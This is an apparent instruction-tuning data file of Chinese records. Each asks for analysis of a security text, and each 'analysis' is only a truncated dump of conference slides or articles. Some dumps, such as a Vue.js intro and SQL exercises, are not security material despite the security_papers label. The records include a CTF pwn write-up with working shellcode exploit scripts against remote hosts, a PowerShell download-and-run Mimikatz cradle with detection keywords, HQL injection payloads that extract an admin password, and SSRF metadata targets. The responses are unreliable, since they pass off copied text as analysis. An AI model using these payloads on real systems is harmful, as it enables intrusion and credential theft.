{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCustomize Evil Protocol to Pwn an SDN Controller HACKING THE BRAIN Feng Xiao, Ph.D. student at PennState, Cyber Security Lab Jianwei Huang, Researcher at Wuhan University Peng Liu, Professor at PennState, Cyber Security Lab Whats SDN? func Virtual Switch func func Control Plane Data Plane Software-Defined Networking (SDN) is an emerging architecture that decouples the network control and forwarding functions. Whats SDN Like Today? Who are using?  More than 15 popular controllers.  More than 3000 open source SDN projects. Who are contributing?  Data Center  IDC  Telecom   Overview of SDN Attacks Attack on Control Plane  Topology tampering  Control channel flooding Attack on Data Plane  Switch OS Hacking  TCAM Flooding Controller APP N E T C O N F Control Plane APP APP O P E N F L O W O V S D B Data Plane Pwn It Like A Hacker? Software-Defined Networks Decoupled Control Plane and Data Plane Firewall Load- Balancing Controller OpenFlow OVSDB Control Channel   Switch Host Infrastructure  Pwn It Like A Hacker? Software-Defined Networks Decoupled Control Plane and Data Plane Our Choice: Custom Attack Firewall Load- Balancing Controller OpenFlow OVSDB Control Channel   Switch Host Infrastructure  Custom Attack Custom Protocol Field (CPF) in legitimate protocol interactions CPF is controlled by data plane CPF will be processed by components in the controller Infrastructure Service APP L I B R A R I E S Controller Custom Attack Custom Protocol Field (CPF) in legitimate protocol interactions CPF is controlled by data plane CPF will be processed by components in the controller Infrastructure Service APP L I B R A R I E S ③ ⑥ Controller CPF results in a semantic gap between control plane and data plane What Can It Cause? Execute Arbitray SDN Commands Steal Confidential Data Crash/Disrupt Service Disable Network Function ... Threat Model We do NOT assume that hackers can have network access to SDN controllers or SDN applications Control channel is well protected by SSL/TLS Threa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# VUE Vue.js读音 /vjuː/, 类似于 view是一个构建数据驱动的 web 界面的渐进式框架 Vue.js 的目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件 ### 简介 Vue 是一套构建用户界面的渐进式框架 Vue 只关注视图层采用自底向上增量开发的设计 Vue 的目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件 Vue 学习起来非常简单对于新手非常友好而且有丰富的中文文档,非常容易上手 ### VUE 作者 Vue.js的作者为Evan You尤雨溪 尤雨溪在国内读完初中才去美国完成大学学业所以说这是一个比较中国的中国人看看尤雨溪对于 VUE 的看法 - 知乎访谈[点击进入](https://mp.weixin.qq.com/s?__biz=MzA4NjE3MDg4OQ%3D%3D&mid=2650964658&idx=1&sn=20bffec66f8b45002addb417a51ea92d&chksm=843aeed4b34d67c216f167bef8a1fdf85cc9bc5059007666869909d31ab86a8bd9d005614e4e&mpshare=1&scene=1&srcid=06137IzUoM84mpRfbUu7tDb0) - 大神面对面[点击进入](https://zhuanlan.zhihu.com/p/27205354) ### Vue 比 React 更适合渐进式 意思是公司有个项目是用 jquery 写的基本结构就是一个个 html 页面这时候可以直接用 script 标签把 vue 引入到页面中直接进行页面功能增强 > Vue 离开了 webpack 可以做很多事情但是 React 离开 webpack 的确就非常不方便了 所以说最简单的基本环境就是html 中直接跟 jQuery 一样引入使用即可 但是我们作为学过 React 的人从另外一个更专业化的角度入门更好 ### 参考 - VUE中文官网[点击进入](https://cn.vuejs.org/) - Vue社区[点击进入](https://www.vue-js.com/) - 博客园博客[点击进入](http://www.cnblogs.com/zhuzhenwei918/category/938372.html) - 菜鸟教程[点击进入](http://www.runoob.com/vue2/vue-tutorial.html)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFeds and 0Days: From Before Heartbleed to After FBI-Apple @Jason_Healey Columbia University Todays Talk 1. How does US government decide to retain or disclose 0days vulnerabilities? 2. How many 0days does the US government keep to itself every year?  Hundreds? Thousands? More? Less? 3. How big is the full US arsenal of 0days?  Hundreds? Thousands? More? Less? 4. What we dont know & recommendations About the Research Team  Reports due by early fall of 2016  Students and professor from SIPA  Columbia Universitys School of International and Public Affairs  One foot in each community: DC and policy Student Research Teams Team 1: Jackie Burns-Koven, Natasha Cohen, and Andrew Liu 0day markets and government involvement Team 2: Mellissa Zubaida Ahmed, Igor Bakharev, Robert Diamond, Nozomi Mizutani, Jittip Mongkolnachaiarunya, Nicole Softness US government vulnerability disclosure program Team 3: Arsla Jawaid, Laurence Kinsella, Andrew Pfender, Arastoo Taslim Security researchers and corporate vulnerability programs, such as responsible disclosure and bug bounty programs Team 4: Niko Efstathiou, Daniel Ismael Gonzalez, Marie von Hafften, Adriana Tache Vulnerability databases and quant measurement Team 5: Sherman Chu, Timothy Hodge, Caitlin LaCroix, Amine Moussaoui, Anthony Sanford Actual use of 0days in the wild and whether other nations have explicit 0day policies Conviction and Research  Levels of confidence  Lines of evidence  Suspicion  Credibility  DC audience  Policy audience  Will you be convinced? Way Overly Simplified Basics of USG Role Strong Tension, Often Bureaucratic Fighting Between Two Groups  Three main users of vulns  DoD: warfare and espionage  Intelligence Community (esp NSA and CIA): espionage and covert action  Law enforcement: Justice, FBI, DHS  Several whose equities want them closed  Commerce - running a vuln disclosure dialog  Treasury, Energy, et al  DHS (CIP and cyber) Three Kinds of Online Targets Sets in Military Terms Each With Different Vuln I", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCTF WriteUp By Nu1L Author:Nu1L CTF WriteUp By Nu1L PWN harmoshell harmoshell2 pwn1 RE crash re123 ARM puzzle WEB ezlogin HCIE RW harmofs01 luaplayground01 && luaplayground02 MISC RSP PWN harmoshell echoshellcode from pwn import * import fuckpy3 context.log_level = 'debug' # p = process('./qemu-riscv64 -L ./libs/ ./harmoshell'.split(' ')) # p = process('./qemu-riscv64 -g 1235 -L ./libs/ ./harmoshell'.split(' ')) p = remote('121.37.222.236', 9999) def launch_gdb(): raw_input() def sc(s): p.recvuntil('$ ') p.sendline(s) harmoshell2 Tcache GOT sc(\"touch \" + 'a'*15) sc(\"touch \" + 'b'*15) # sc(\"cat \" + 'a'*16) sc('echo >> ' + 'a'*15) sleep(0.1) # 0x40007ffd40 # shellcode ='0343a4b79794849b04b27b74849304b234b4849304b622f48493fe913823fe013c23ff010513f ff02593fff026130dd0089300000073'.unhex() payload = b'' payload +=p32(0x343a4b7) payload +=p32(0x9794849b) payload +=p16(0x04b2 ) payload +=p32(0x7b748493) payload +=p16(0x04b2 ) payload +=p32(0x34b48493) payload +=p16(0x04b6 ) payload +=p32(0x22f48493) payload +=p32(0xfe913823) payload +=p32(0xfe013c23) payload +=p32(0xff010513) payload +=p32(0xfff02593) payload +=p32(0xfff02613) payload +=p32(0x0dd00893) payload +=p32(0x00000073) shellcode = payload p.send(shellcode) sc('echo > ' + 'c'*15) sleep(0.1) p.send(shellcode.ljust(0x138,b'a') + p64(0x25f10)) p.interactive() # -*- coding: utf-8 -*- import sys from pwn import * context.log_level ='debug' # HOST, PORT = \"127.0.0.1\", \"31338\" HOST, PORT = \"139.159.132.55\", \"9999\" p = remote(HOST, PORT) def touch(para): p.sendlineafter('$ ', 'touch '+para) def rm(para): p.sendlineafter('$ ', 'rm '+para) def cat(para): p.sendlineafter('$ ', 'cat '+para) def ls(): p.sendlineafter('$ ', 'ls') def echo(para, cnt): p.sendlineafter('$ ', 'echo > '+para) p.send(cnt) def echo2(para, cnt): p.sendlineafter('$ ', 'echo >> '+para) p.send(cnt) touch('a') touch('b') touch('c') payload = b'' payload +=p32(0x343a4b7) payload +=p32(0x9794849b) payload +=p16(0x04b2) payload +=p32(0x7b748493) payload +=p16(", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to Disclose or Sell an Exploit Without Getting in Trouble Jim Denaro @CipherLaw 1 DEF CON 21 This presentation is not legal advice about your specific situation. If I were your lawyer, Id advise you not to answer that tweet. DEF CON 21 2 What are we talking about? Techniques Information relating to both exploits and vulnerabilities that enable another party to obtain unauthorized access to a computer, deny access by others to a computer, or cause permanent or temporary damage to a computer or a network. DEF CON 21 3 Risks in Publishing or Selling Conspiracy to violate the CFAA 4 DEF CON 21 Risks in Publishing or Selling  Providing material support to terrorists  Aiding and abetting  Cryptography export/arms controls  Treason  Espionage Act 5 DEF CON 21 Regulatory Outlook Trends In the US In Europe Globally 6 DEF CON 21 Practical Countermeasures Create Dual-Use Tools. 7 DEF CON 21 Practical Countermeasures Know your reader / buyer. Do not direct technique information to someone you suspect is likely to use it illegally. 8 DEF CON 21 Practical Countermeasures Be aware of any pre-existing relationships with possible targets of the technique. 9 DEF CON 21 Practical Countermeasures Avoid unintentionally creating knowledge and intent. 10 DEF CON 21 Practical Countermeasures Be careful in providing support. 11 DEF CON 21 Practical Countermeasures Use disclaimers Compliance with Law. Customer acknowledges that the Software can be configured by the user to obtain access to information using penetration techniques that may cause disruption in systems or services and may cause data corruption. Denial of Service attacks may be run on command that will attempt to render systems and services unavailable to authorized users. Customer specifically agrees that the Software will only be used to target devices under the authorized control of the Customer and in a way in which damage to systems or loss of access or loss of data will create no liability for [company] or any third pa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH IPTABLES-RESTORE 8 \"Jan 04, 2001\" \"\" \"\" .\\\" .\\\" Man page written by Harald Welte <laforge@gnumonks.org> .\\\" It is based on the iptables man page. .\\\" .\\\" This program is free software; you can redistribute it and/or modify .\\\" it under the terms of the GNU General Public License as published by .\\\" the Free Software Foundation; either version 2 of the License, or .\\\" (at your option) any later version. .\\\" .\\\" This program is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public License .\\\" along with this program; if not, write to the Free Software .\\\" Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. .\\\" .\\\" .SH NAME iptables-restore \\- 恢复 IP Tables .SH \"总览 SYNOPSIS\" .BR \"iptables-restore \" \"[-c] [-n]\" .br .SH \"描述 DESCRIPTION\" .PP .B iptables-restore 用来从 STDIN 给出的数据中恢复 IP Tables 使用 shell 的 I/O 重定向功能来从文件中获取数据 .TP \\fB\\-c\\fR, \\fB\\-\\-counters\\fR 恢复所有报文和字节计数的值 .TP \\fB\\-n\\fR, \\fB\\-\\-noflush\\fR .TP 不刷新表中从前的内容如果没有指定 .B iptables-restore 会刷新 (删除) 相应 IP Tables 中所有从前的内容 .SH BUGS 无 .SH \"作者 AUTHOR\" Harald Welte <laforge@gnumonks.org> .SH \"参见 SEE ALSO\" .BR iptables-save \"(8), \" iptables \"(8) \" .PP iptables-HOWTO 记述了 iptables 用法的细节 NAT-HOWTO 记述了 NAT 的细节 netfilter-hacking-HOWTO 记述了内部实现的细节 . .SH \"[中文版维护人]\" .B 杨鹏 NetSnake <email> .br .B Poopy <email> (?) .SH \"[中文版最新更新]\" .B 2002.05.01 .SH \"中国linux论坛man手册翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SQL 练习 <!-- GFM-TOC --> * [SQL 练习](#sql-练习) * [595. Big Countries](#595-big-countries) * [627. Swap Salary](#627-swap-salary) * [620. Not Boring Movies](#620-not-boring-movies) * [596. Classes More Than 5 Students](#596-classes-more-than-5-students) * [182. Duplicate Emails](#182-duplicate-emails) * [196. Delete Duplicate Emails](#196-delete-duplicate-emails) * [175. Combine Two Tables](#175-combine-two-tables) * [181. Employees Earning More Than Their Managers](#181-employees-earning-more-than-their-managers) * [183. Customers Who Never Order](#183-customers-who-never-order) * [184. Department Highest Salary](#184-department-highest-salary) * [176. Second Highest Salary](#176-second-highest-salary) * [177. Nth Highest Salary](#177-nth-highest-salary) * [178. Rank Scores](#178-rank-scores) * [180. Consecutive Numbers](#180-consecutive-numbers) * [626. Exchange Seats](#626-exchange-seats) <!-- GFM-TOC --> ## 595. Big Countries https://leetcode.com/problems/big-countries/description/ ### Description ```html +-----------------+------------+------------+--------------+---------------+ | name | continent | area | population | gdp | +-----------------+------------+------------+--------------+---------------+ | Afghanistan | Asia | 652230 | 25500100 | 20343000 | | Albania | Europe | 28748 | 2831741 | 12960000 | | Algeria | Africa | 2381741 | 37100000 | 188681000 | | Andorra | Europe | 468 | 78115 | 3712000 | | Angola | Africa | 1246700 | 20609294 | 100990000 | +-----------------+------------+------------+--------------+---------------+ ``` 查找面积超过 3,000,000 或者人口数超过 25,000,000 的国家 ```html +--------------+-------------+--------------+ | name | population | area | +--------------+-------------+--------------+ | Afghanistan | 25500100 | 652230 | | Algeria | 37100000 | 2381741 | +--------------+-------------+--------------+ ``` ### Solution ```sql SELECT name, population, area FROM World WHERE area > 3000000 OR population > 25000000; ``` ### SQL Schema SQL Schema 用于在本地环境下创建表结构", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAutomated Malware Similarity Analysis Daniel Raygoza General Dynamics Advanced Information Systems 1 Friday, June 26, 2009 Disclaimers (they seem like a good idea)  This project and presentation are my own personal work, and they are not a product of (or approved by) General Dynamics (GD) or its customers.  Anything I say is my own opinion, not GDs or its customers. 2 Friday, June 26, 2009 Problem  In-depth malware analysis is expensive  Difficult to reduce duplicated effort as teams grow  Anything not automated would probably counter benefits 3 Friday, June 26, 2009 Target Niche  Teams that:  Routinely unpack and analyze incoming samples  Want to avoid duplicate analysis  Looking for similarity links 4 Friday, June 26, 2009 Initial Idea  Use IDA for auto-analysis of all samples  Break samples into functions  Calculate a fuzzy hash of all functions  Calculate the similarity between all functions in the entire system  Weight and aggregate similarity scores between a given sample and all other samples in the system 5 Friday, June 26, 2009 Fuzzy Hashing In A Few Seconds  Fuzzy hashing, created by Jesse Kornblum, based on spamsum by Andrew Tridgell  The output hash value is tolerant of changes in the input  Hash values compared against each other to compute similarity 6 Friday, June 26, 2009 On Fuzzy Hashing  Full binary fuzzy hashing of malware doesnt perform well in many cases (packing, reordering of functions, partial code reuse, etc).  Small files tend to be heavy on structure and light on code, causes a lot of mismatches.  Many issues are addressed by using fuzzy hashing at the function level on unpacked binaries, though its still not perfect.  If we can expect similarity between any extracted byte-streams to be meaningful, we can apply fuzzy hashing effectively. 7 Friday, June 26, 2009 Existing Research  Automated malware similarity analysis definitely isnt new  There are many published papers on malware similarity analysis using a variety of techniques, some of which", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Keyspace Vulnerabilities in Locks Bill Graydon @access_ctrl b.graydon@ggrsecurity.com github.com/bgraydon Take a look at your keyring... 2 Outline  How locks & keys work  Intro to the tools Im releasing  Brute forcing all possible keys  Reading the pins in a lock  Impressioning with extra information  Keyed alike systems & lock disassembly in nonmastered systems  Information theory and entropy  How master keying works  Deriving a master key from multiple low-level keys  Rights amplification in mastered systems  Special cases: construction keying, IC cores, Medeco, Mul-T-Lock  Remediation 3 Software Analysis Tools Try it yourself! https://ggrsecurity.com/personal/~bgraydon/keyspace Or: https://tinyurl.com/key-space Source: https://github.com/bgraydon/lockview https://github.com/bgraydon/keyspace 4 How Locks Work What is a key? Mechanically encoded information. 7 Background | Key Codes 8 Background | Key Codes | Bitting 87527 # INCH MM 0 0.335 8.51 1 0.320 8.13 2 0.305 7.75 3 0.290 7.37 4 0.275 6.99 5 0.260 6.60 6 0.245 6.22 7 0.230 5.84 8 0.215 5.46 9 0.200 5.08 10 Background | Key Codes 52864 87527 11 MACS - Maximum Adjacent Cut Specification 12 MACS - Maximum Adjacent Cut Specification 14 MACS = Maximum Adjacent Cut Specification Key Type MACS Schlage 7 Kwikset 4 Sargent 7 Yale 7 Weiser 7 Medeco 2,3,4 Keyspaces In theory - Number of depths to the power of the number of spaces E.g. - Schlage - 10 depths, to the power of 5 or 6 spaces - 100,000 or 1,000,000 possible combinations Medeco - 6 depths, to the power of 5 or 6 spaces - 7000 or 46000 combinations There are further limitations imposed by physical constraints! 16 Keys vs. Passwords Trait Password Key Cost to try one $0.00000000001 $0.30-$10.00 Detectability of brute force Possible Challenging Length Unlimited Severely Limited Complexity Unlimited Limited Ease of changing Easy Costly and time-consuming Privilege levels Unlimited schemes Limited to hierarchical* 17 The Economics of Brute-Force Attacks", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKCon KCon Powershell攻击与防御 360天马安全团队 王永涛(@sanr) Get-Host  360天马安全研究员 WIFI安全 渗透测试 入侵检测  联系方式 weibo.com/0xls ssssanr@gmail.com github.com/ssssanr CONTENTS PowerShell概述 传统的powershell防御 Powershell攻击 PowerShell检测不防御 %95 Powershell脚本为恶意 PowerShell概述 PowerShell概述 如linux 的Bash 基于.Net 技术 WMI Log Registry . Windows API .NET 导入模块 添加新命令 PowerShell概述 操作系统默认Powershell版本 $PSVersionTable PowerShell Desktop OS Server OS Version 2 Windows 7 Windows 2008 R2 Version 3 Windows 8 Windows 2012 Version 4 Windows 8.1 Windows 2012 R2 Version 5 Windows 10 Windows 2016 攻击者为什么爱PowerShell? 白名单 系统自带 远程管理 使用Windows API.Net代码 内存加载 powershell 默认环境下的PowerShell防御 PowerShell执行策略 Restricted 默认的设置 不允许 任何脚本运行 AllSigned 只能运行经过数字证 书签名的脚本 Remote Signed 本地运行脚本不需要 数字签名但运行下 载的脚本需要 Unrestricted 允许所有的脚本运行 Restricted  PS1文件丌会自动执行 默认策略禁用所有脚本执行 PowerShell执行策略 PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1 powershell \"IEX (New-Object Net.WebClient).DownloadString(a.com/a.ps'); InvokeMimikatz Bypass PowerShell执行策略 PowerShell是Windows系统的一个核心组件(且丌可移除) 存在于 System.Management.Automation.dll 动态链接库文件(DLL) 使用.Net就可以调用powershell 禁止powershell有用吗 从.Net运行powershell 从.Net运行powershell Powershell攻击 VBA Wmi HTA CHM Js/Vbs 绕过执行策略 多种方式调用 Office VBA-PowerShell Js-PowerShell HTA -powershell CHM -powershell Empire Inveigh Nishang PowerCat PowerSploit Invoke-TheHash WMImplant OWA-Toolkit PowerUpSQL SessionGopher PowerShell Tools - Attack http://www.powershellempire.com/ Empire https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 PowerSploit- PowerView https://github.com/fireeye/SessionGopher SessionGopher Powershell检测不防御 Powershell 免杀 PowerShell版本3及以上 >组策略 >计算机设置 >管理模板 >Windows组件 Windows powershell: Module Logging psv3 Script Block Logging psv5 EncodedCommand XOR, Base64, ROT13 Powershell 日志记录 PowerShell Module Logging Module Logging Invoke-Expression (IEX) Module Logging .Net Web Clientdownload Module Logging mimikatz gentilkiwi 关键词检测Invoke-Mimikatz System.Reflection.AssemblyName SE_PRIVILEGE_ENABLED System.R", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 .NET MALWARE THREAT: INTERNALS AND REVERSING DEF CON USA 2019 DEF CON USA 2019 by Alexandre Borges ALEXANDRE BORGES  MALWARE AND SECURITY RESEARCHER DEF CON USA 2019 2 Malware and Security Researcher. Speaker at DEF CON USA 2018 Speaker at DEF CON China 2019 Speaker at CONFidence Conference 2019 (Poland) Speaker at HITB 2019 Amsterdam Speaker at BSIDES 2019/2018/2017/2016 Speaker at H2HC 2016/2015 Speaker at BHACK 2018 Consultant, Instructor and Speaker on Malware Analysis, Memory Analysis, Digital Forensics and Rootkits. Reviewer member of the The Journal of Digital Forensics, Security and Law. Referee on Digital Investigation: The International Journal of Digital Forensics & Incident Response Agenda: Introduction Managed executable structures CLR and Assembly Loader details .NET internals metadata Modules, assemblies and manifest .NET program structures Malicious code through MSIL .NET debugging Few GC and synchronous aspects Conclusion ALEXANDRE BORGES  MALWARE AND SECURITY RESEARCHER ALEXANDRE BORGES  MALWARE AND SECURITY RESEARCHER DEF CON USA 2019 3 Last talks in conferences: CONFidence Conference 2019: https://confidence-conference.org/2019/bio.html#id=37486 slides: http://www.blackstormsecurity.com/CONFIDENCE_2019_ALEXANDRE.pdf DEF CON China 2019: https://www.defcon.org/html/dc-china-1/dc-cn-1-speakers.html#Borges slides: http://www.blackstormsecurity.com/docs/DEFCON_CHINA_ALEXANDRE.pdf HITB Amsterdam 2019: https://conference.hitb.org/hitbsecconf2019ams/speakers/alexandre-borges/ slides: http://www.blackstormsecurity.com/docs/HITB_AMS_2019.pdf DEF CON USA 2018: https://www.defcon.org/html/defcon-26/dc-26-speakers.html#Borges slides: http://www.blackstormsecurity.com/docs/DEFCON2018.pdf Malwoverview Tool: https://github.com/alexandreborges/malwoverview ALEXANDRE BORGES  MALWARE AND SECURITY RESEARCHER INTRODUCTION DEF CON USA 2019 4 ALEXANDRE BORGES  MALWARE AND SECURITY RESEARCHER ALEXANDRE BORGES  MALWARE AND SECURITY RESEARCHER DEF CON USA 2019 5 Motivat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSession Donation Alek Amrani DEF CON 17 About me  Alek Amrani  Longhorn Lockpicking Club  UT Austin CS Undergrad  UT Austin ISO  Alek Amrani  Longhorn Lockpicking Club  UT Austin CS Undergrad  UT Austin ISO This Talk  TURBO TRAC  Not a lot of time, so brevity is the name of the game  Presenting an Idea, as well as the thought process behind the formation of the idea  Questions / Comments / Whatnot  Time planned at end for this Background Info  Session ID (SID) Attack  Session Hijacking  Session Fixation  Cross-Site Scripting  Cross-Site Cooking  Countermeasures exist Background Info  Some common countermeasures taken to prevent session hijacking  Use of a long random session key  Regeneration of SID  Encrypted transmissions  Secondary Checks  Limiting by IP Address, etc.  Changing SID often Session Donation  What is Session Donation  Exactly what it sounds like.  Donating your SID to someone else.  Very similarly to Session Fixation  You need to fix the victims session to a particular ID  Many Session Fixation countermeasures wont work  Only accepting server generated IDs from a cookie  Regenerating SIDs  Etc.  Its much easier to give someone your identity rather than stealing theirs Session Donation  Are you Insane? Why would I give my info away...  Example Scenario:  Joe logs into a service and deletes the stored information  Joe donates his session to Jim  Joe tells Jim there were problems earlier, and hell need to re-enter his information  Jim goes to the page, and inputs his information and  saves it  Joe can now login as himself, and has Jims information Session Donation  Issues do exist  User does not have to login  PEBKAC  User training, if any, is usually geared toward being cautious when authenticating  'Single Login' Setups  Cooperations, Universities, etc.  Connection does not need to be interrupted for this attack vector  SSL Certs still valid Session Donation  Requirements for Attack  Attacker must be able to obtain a SID  If the attacker can login/use", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Integer Overflow and Underflow ## 原理 EVM的整数有 `int` 和 `uint` 两种对应有无符号的情况在 `int` 或 `uint` 后可以跟随一个8的倍数表示该整数的位数如8位的 `uint8`位数上限为256位`int` 和 `uint` 分别是 `int256` 和 `uint256` 的别名一般 `uint` 使用的更多 在整数超出位数的上限或下限时就会静默地进行取模操作通常我们希望费用向上溢出变小或者存款向下溢出变大整数溢出漏洞可以使用 SafeMath 库来防御当发生溢出时会回滚交易 ## 例子 以 Capture The Ether 的 Token sale 为例 ```solidity pragma solidity 0.4.21; contract TokenSaleChallenge { mapping(address => uint256) public balanceOf; uint256 constant PRICE_PER_TOKEN = 1 ether; function TokenSaleChallenge(address _player) public payable { require(msg.value == 1 ether); } function isComplete() public view returns (bool) { return address(this).balance < 1 ether; } function buy(uint256 numTokens) public payable { require(msg.value == numTokens * PRICE_PER_TOKEN); balanceOf[msg.sender] += numTokens; } function sell(uint256 numTokens) public { require(balanceOf[msg.sender] >= numTokens); balanceOf[msg.sender] -= numTokens; msg.sender.transfer(numTokens * PRICE_PER_TOKEN); } } ``` 在本题中购买单个代币需要支付 1 ether即 `msg.value == numTokens * PRICE_PER_TOKEN`在EVM中货币以 wei 为单位1 ether 实际上是 $10  { 18 }$ wei即 0xde0b6b3a7640000 wei如果让这里的 `numTokens` 大一些乘积就可能溢出例如我们购买 $2  { 256 } // 10  { 18 } + 1$ 个代币乘上 $10  { 18 }$ 后就发生了溢出最终花费仅约 0.4 ether 就买到了大量代币然后我们将买到的代币部分卖出即可完成题目要求 整数下溢的一个例子是减法操作假设有一个合约实现了如下功能 ```solidity contract Bank { mapping(address => uint256) public balanceOf; ... function withdraw(uint256 amount) public { require(balanceOf[msg.sender] - amount >= 0); balanceOf[msg.sender] -= amount; msg.sender.send.value(amount)(); } } ``` 乍看之下没有问题实际上 require 一行`balanceOf[msg.sender]-amount` 的结果作为无符号整数永远是大于等于 0 的导致我们可以任意取款正确的写法是 `require(balanceOf[msg.sender] >= amount)` 整数下溢的另一个例子与重入攻击有关如将持有数为 1 的物品卖出两次或者将 1 ether 存款取出两次导致结果为负数储存为 uint 则为巨大的正数 ## 题目 绝大部分重入攻击的题目都涉及到向下溢出可参照重入攻击的部分不涉及重入攻击的相对较少可以参考以下题目 ### ByteCTF 2019 - 题目名称 hf - 题目名称 bet !!! note 注题目附件相关内容可至 [ctf-challenges/blockchain](https://github.com/ctf-wiki/ctf-challenges/tree/master/blockchain) 仓库寻找", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRobert Imhoff-Dousharm US Resident Las Vegas, NV, USA rimhoffd@shebangsoft.org Professional Sound Byte - Robert has been working with computer systems for over 11 years. He has worked in the security field for the better part of 4 years. His most recent, has been working with credit card technologies, and the security behind them. He has recently been informed that he will be published in the September 2003 issue of Transaction World Magazine (http//www.transactionworld.com), in regards to credit card networks. Currently Robert works with a major ePayment Gateway, and works as a credit card security auditor privately. Personal Sound Byte - Living in Las Vegas, NV, USA Robert enjoys exploring sin city and every little sin it has to offer. On a sane level he also enjoys hiking at Red Rock Canyon, political talks at local coffee shops, and spending as much time as he can with his 4 year old son, Orion. Computer Sound Byte - Robert tends to be as much a freak about computers as the next guy, well, at DefCon anyway. He currently hosts would be dot com sites from his bedroom, about 6 .com pages, including His home page - http//www.hackajar.com His Consulting firm site - http//www.shebangsoft.org Dormant Saturn Enthusiasts site - http//www.saturnclubs.com Friends Ever Quest guild site - http//www.guardianlords.com / http//www.abandonguild.com (ironically abandoned!) Friends would be \"project\" - http//www.vegascpu.com His room looks like a small data center 2 cable modem uplinks 1 Wireless ISP uplink 2 Switches 1 802.11b \"Hot Spot Ready\" Wi-Fi WEP 2 DNS servers 1 Firewall (BSD) 2 Apache servers (1 used as pre-production and storage) 1 Test bed BSD box 1 \"Primary\" computer (the grocery getter') 1 Sun Ultra 5 1 IBM PS/2 Model 80 386 ALIVE AND KICKIN!!! 3 Computer unused (they need to adopt HDD's) Complete with 3 Circuit breakers @ 50AMPS and UPS's to keep it all alive. Now it may be true that he has no 'real' reason for running all this gear, it's still an expensive hobby he ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia ## Summary * [HQL Comments](#hql-comments) * [HQL List Columns](#hql-list-columns) * [HQL Error Based](#hql-error-based) * [Single Quote Escaping](#single-quote-escaping) * [$-quoted strings](#--quoted-strings) * [DBMS Magic functions](#dbms-magic-functions) * [Unicode](#unicode) * [Java constants](#java-constants) * [Methods by DBMS](#methods-by-dbms) * [References](#references) :warning: Your input will always be between the percentage symbols: `%INJECT_HERE%` ## HQL Comments ```sql HQL does not support comments ``` ## HQL List Columns ```sql from BlogPosts where title like '%' and DOESNT_EXIST=1 and ''='%' -- and published = true ``` Using an unexisting column will an exception leaking several columns names. ```sql org.hibernate.exception.SQLGrammarException: Column \"DOESNT_EXIST\" not found; SQL statement: select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159] ``` ## HQL Error Based ```sql from BlogPosts where title like '%11' and (select password from User where username='admin')=1 or ''='%' and published = true ``` Error based on value casting. ```sql Data conversion error converting \"d41d8cd98f00b204e9800998ecf8427e\"; SQL statement: select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1 `", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAPI-Induced SSRF How Apple Pay Scattered Vulnerabilities Across the Web About me  Math degree  Web developer, ~5 years  Bounties  At PKC ~1 year, web dev and code audits for clients - pkc.io Intro Overview  Definitions  Demo some mistakes  Apple Pay  Twilio  Others  How not to be like Apple Intro Diagram of Inductive Weaknesses Weak Code (e.g. Heartbleed) Vulnerable Deployment Vulnerable Deployment ... Typical Class Breaks See Schneiers blog post Diagram of Inductive Weaknesses ??? Weak Code Weak Code Vulnerable Deployment Vulnerable Deployment ... ... Diagram of Inductive Weaknesses Inductive Weakness Weak Code Weak Code Vulnerable Deployment Vulnerable Deployment ... ... Inductive weakness: A design flaw that encourages multiple parties to write vulnerable code with a similar exploit pattern across differing software stacks. Definitions Image SSRF Refresher Definitions: SSRF 169.254.169.254 Payload with http://169.254.169.254/foo Definitions: SSRF 